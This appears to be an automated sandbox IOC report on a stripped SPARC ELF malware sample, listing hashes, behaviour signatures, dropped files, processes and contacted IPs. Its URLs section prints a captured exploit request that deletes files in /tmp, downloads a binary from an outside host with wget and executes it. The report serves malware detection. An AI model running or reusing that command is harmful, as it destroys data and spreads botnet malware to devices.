Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

SLdtSSVlj2

ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
Entropy:	6.137666783957336
Filename:	SLdtSSVlj2
Filesize:	87664
MD5:	6b355f508658f7fbe9c91fad5d09d6b5
SHA1:	72a9d43e568016e0384a39e391391498695328bd
SHA256:	9010857d2724b141fc1ccc742e9d5d41ff50e102878d196fd9726458b0864c19
SHA512:	a9cab0b7fd2ff29f3e5d585d504f4ca2d991dff56829fde45695c819a57e7f9a5afb3ebe8e6e84ba3f75022006c216dbe405a80af33f3e75504f4c2fba4114e4
SSDEEP:	1536:iRbOxiKmmrxvErU5J9JJL4aymGuxwOWPnhIm2K09YZnZSZ55ESUJ:iJOxvlrxsXaywk72KmGZ65WR
Preview:	.ELF...........................4..T......4. ...(......................Rh..Rh..............Rl..Rl..Rl...4............dt.Q................................@..(....@.J.................#.....`...`.....!....."...@.....".........`......$"..."...@...........`....

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Malicious sample detected (through community Yara rule)	System Summary
Sample tries to kill multiple processes (SIGKILL)	System Summary
Yara signature match	System Summary
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion
Enumerates processes within the "proc" file system	Persistence and Installation Behavior	OS Credential Dumping
Sample listens on a socket	Networking
Sample tries to kill a process (SIGKILL)	System Summary
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery

/var/lib/whoopsie/whoopsie-id.02WAG1

ASCII text, with no line terminators

dropped

Details

File:	/var/lib/whoopsie/whoopsie-id.02WAG1
Category:	dropped
Dump:	whoopsie-id.02WAG1.22.dr
ID:	dr_0
Target ID:	22
Process:	/usr/bin/whoopsie
Type:	ASCII text, with no line terminators
Entropy:	3.9410969045919657
Encrypted:	false
Ssdeep:	3:19y6UTAvBTdDVEQcNgAT0XUQhd3tjCZccCKcsVQWQ7JW:3y6BlVEfQXU8djCZd40
Size:	128
Whitelisted:	false
Reputation:	moderate

/var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system.journal

data

dropped

Details

File:	/var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system.journal
Category:	dropped
Dump:	system.journal.31.dr
ID:	dr_3
Target ID:	31
Process:	/lib/systemd/systemd-journald
Type:	data
Entropy:	1.448047321524811
Encrypted:	false
Ssdeep:	3:F31HliKvW/2kl/kKvW/28t:F382Mq2
Size:	240
Whitelisted:	false
Reputation:	low

/var/log/kern.log

ASCII text, with very long lines

dropped

Details

File:	/var/log/kern.log
Category:	dropped
Dump:	kern.log.27.dr
ID:	dr_2
Target ID:	27
Process:	/usr/sbin/rsyslogd
Type:	ASCII text, with very long lines
Entropy:	5.002979720194877
Encrypted:	false
Ssdeep:	96:vqXAOy+f2Be+4Dv0qRWOr8Mohr0BYHOq02IFgMB4igbEjSOf3eBiqqI5VOSPNpvV:Slr8+2Oc489CUR1VzbXw76lix4Rf
Size:	6846
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Writes log files to disk	Persistence and Installation Behavior

/var/log/syslog

ASCII text, with very long lines

dropped

Details

File:	/var/log/syslog
Category:	dropped
Dump:	syslog.27.dr
ID:	dr_1
Target ID:	27
Process:	/usr/sbin/rsyslogd
Type:	ASCII text, with very long lines
Entropy:	5.088105719006059
Encrypted:	false
Ssdeep:	192:SIWer8+2Oca89CUR1VzbXw76lix4EuR7qS0z8+bn9NuvBc0m7+T:cAMOca89CUR1V/Xw76lix4EuR7qS0z8F
Size:	10480
Whitelisted:	false
Reputation:	low

Processes

Path

Cmdline

Malicious

/tmp/SLdtSSVlj2

n/a

/tmp/SLdtSSVlj2

n/a

/tmp/SLdtSSVlj2

n/a

/tmp/SLdtSSVlj2

n/a

/tmp/SLdtSSVlj2

n/a

/tmp/SLdtSSVlj2

n/a

/tmp/SLdtSSVlj2

n/a

/usr/lib/systemd/systemd

n/a

/usr/bin/journalctl

/usr/bin/journalctl --smart-relinquish-var

/usr/lib/systemd/systemd

n/a

/usr/bin/dbus-daemon

/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

/usr/lib/systemd/systemd

n/a

/usr/bin/whoopsie

/usr/bin/whoopsie -f

/usr/lib/systemd/systemd

n/a

/usr/bin/pulseaudio

/usr/bin/pulseaudio --daemonize=no --log-target=journal

/usr/lib/systemd/systemd

n/a

/usr/sbin/rsyslogd

/usr/sbin/rsyslogd -n -iNONE

/usr/libexec/gvfsd-fuse

n/a

/bin/fusermount

fusermount -u -q -z -- /run/user/1000/gvfs

/usr/lib/systemd/systemd

n/a

/lib/systemd/systemd-journald

/usr/lib/systemd/systemd

n/a

/usr/bin/pulseaudio

/usr/bin/pulseaudio --daemonize=no --log-target=journal

/usr/lib/systemd/systemd

n/a

/usr/libexec/rtkit-daemon

/usr/lib/systemd/systemd

n/a

/lib/systemd/systemd-logind

/usr/sbin/gdm3

n/a

/etc/gdm3/PrimeOff/Default

/usr/lib/systemd/systemd

n/a

/usr/bin/dbus-daemon

/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

/usr/sbin/gdm3

n/a

/etc/gdm3/PrimeOff/Default

/usr/lib/systemd/systemd

n/a

/lib/systemd/systemd-journald

/usr/lib/systemd/systemd

n/a

/usr/bin/whoopsie

/usr/bin/whoopsie -f

/usr/lib/systemd/systemd

n/a

/usr/sbin/rsyslogd

/usr/sbin/rsyslogd -n -iNONE

/usr/lib/systemd/systemd

n/a

/usr/bin/pulseaudio

/usr/bin/pulseaudio --daemonize=no --log-target=journal

/usr/lib/systemd/systemd

n/a

/lib/systemd/systemd-logind

/usr/sbin/gdm3

n/a

/etc/gdm3/PrimeOff/Default

/usr/lib/systemd/systemd

n/a

/usr/bin/dbus-daemon

/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

/usr/lib/systemd/systemd

n/a

/lib/systemd/systemd-journald

/usr/lib/systemd/systemd

n/a

/usr/bin/dbus-daemon

/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

/usr/lib/systemd/systemd

n/a

/usr/bin/whoopsie

/usr/bin/whoopsie -f

/usr/lib/systemd/systemd

n/a

/usr/sbin/rsyslogd

/usr/sbin/rsyslogd -n -iNONE

/usr/lib/systemd/systemd

n/a

/usr/bin/pulseaudio

/usr/bin/pulseaudio --daemonize=no --log-target=journal

/usr/lib/systemd/systemd

n/a

/usr/bin/dbus-daemon

/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

/usr/lib/systemd/systemd

n/a

/lib/systemd/systemd-journald

/usr/lib/systemd/systemd

n/a

/usr/bin/whoopsie

/usr/bin/whoopsie -f

/usr/lib/systemd/systemd

n/a

/usr/sbin/rsyslogd

/usr/sbin/rsyslogd -n -iNONE

/usr/lib/systemd/systemd

n/a

/usr/sbin/rsyslogd

/usr/sbin/rsyslogd -n -iNONE

/usr/lib/systemd/systemd

n/a

/usr/bin/whoopsie

/usr/bin/whoopsie -f

/usr/lib/systemd/systemd

n/a

/usr/bin/gpu-manager

/usr/bin/gpu-manager --log /var/log/gpu-manager.log

/usr/lib/systemd/systemd

n/a

/usr/share/gdm/generate-config

/usr/lib/systemd/systemd

n/a

/usr/bin/gpu-manager

/usr/bin/gpu-manager --log /var/log/gpu-manager.log

/usr/lib/systemd/systemd

n/a

/usr/share/gdm/generate-config

/usr/lib/systemd/systemd

n/a

/usr/bin/gpu-manager

/usr/bin/gpu-manager --log /var/log/gpu-manager.log

/usr/lib/systemd/systemd

n/a

/usr/share/gdm/generate-config

/usr/lib/systemd/systemd

n/a

/usr/lib/systemd/systemd

n/a

There are 74 hidden processes, click here to show them.

URLs

Name

Malicious

http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws

217.88.122.189

IPs

Domain

Country

Malicious

156.105.187.203

unknown

United States

143.73.37.90

unknown

United States

23.112.136.211

unknown

United States

65.127.38.165

unknown

United States

8.43.89.79

unknown

United States

223.7.246.150

unknown

China

81.53.39.132

unknown

France

157.159.2.10

unknown

France

85.94.181.108

unknown

Andorra

84.93.195.206

unknown

United Kingdom

117.53.0.207

unknown

Japan

49.142.216.66

unknown

Korea Republic of

98.73.120.251

unknown

United States

213.211.198.3

unknown

Germany

219.103.245.214

unknown

Japan

111.130.217.227

unknown

China

4.76.23.211

unknown

United States

211.10.223.182

unknown

Japan

47.99.127.89

unknown

China

46.116.224.198

unknown

Israel

58.4.23.157

unknown

Japan

195.254.204.141

unknown

Norway

12.51.215.185

unknown

United States

77.38.175.50

unknown

Latvia

141.7.4.238

unknown

Germany

106.40.39.9

unknown

China

153.103.147.76

unknown

United States

120.38.218.114

unknown

China

190.242.223.55

unknown

Colombia

210.34.243.63

unknown

China

109.124.205.206

unknown

Russian Federation

39.169.69.182

unknown

China

143.95.243.22

unknown

United States

178.48.33.205

unknown

Hungary

118.221.156.95

unknown

Korea Republic of

93.47.233.169

unknown

Italy

117.53.204.29

unknown

Korea Republic of

106.130.151.96

unknown

Japan

53.71.60.182

unknown

Germany

206.189.21.127

unknown

United States

188.97.76.226

unknown

Germany

139.106.192.0

unknown

Norway

167.165.177.98

unknown

United States

24.200.77.29

unknown

Canada

47.240.52.241

unknown

United States

111.41.154.180

unknown

China

39.41.6.181

unknown

Pakistan

97.208.98.77

unknown

United States

178.181.134.183

unknown

Poland

45.177.55.212

unknown

El Salvador

5.18.76.220

unknown

Russian Federation

136.73.59.246

unknown

United States

216.14.205.189

unknown

Australia

206.132.0.140

unknown

United States

198.63.62.42

unknown

United States

134.106.195.170

unknown

Germany

152.187.199.199

unknown

United States

37.192.174.66

unknown

Russian Federation

116.209.105.167

unknown

China

183.244.15.145

unknown

China

175.152.186.231

unknown

China

142.32.230.217

unknown

Canada

4.89.195.39

unknown

United States

210.173.247.82

unknown

Japan

198.248.158.135

unknown

United States

85.240.148.176

unknown

Portugal

62.207.18.187

unknown

Netherlands

170.251.162.210

unknown

United States

36.105.37.71

unknown

China

138.92.199.12

unknown

United States

155.92.185.225

unknown

United States

77.123.221.2

unknown

Russian Federation

198.198.81.55

unknown

United States

96.220.159.13

unknown

United States

200.206.126.94

unknown

Brazil

98.255.78.152

unknown

United States

170.232.16.113

unknown

United States

38.142.127.80

unknown

United States

111.4.64.167

unknown

China

77.9.31.137

unknown

Germany

140.135.133.43

unknown

Taiwan; Republic of China (ROC)

147.20.20.62

unknown

United States

130.119.254.111

unknown

United States

222.93.139.47

unknown

China

156.115.201.253

unknown

Switzerland

154.27.167.245

unknown

United States

58.146.33.202

unknown

Japan

27.142.144.254

unknown

Japan

120.72.61.112

unknown

China

143.197.76.38

unknown

United States

44.223.80.47

unknown

United States

73.211.187.52

unknown

United States

162.179.208.90

unknown

United States

210.143.214.206

unknown

Japan

92.185.105.33

unknown

France

66.71.205.67

unknown

United States

119.153.46.164

unknown

Pakistan

219.128.232.14

unknown

China

39.87.126.183

unknown

China

52.144.33.89

unknown

United States

There are 90 hidden IPs, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report

Files

Processes

URLs

IPs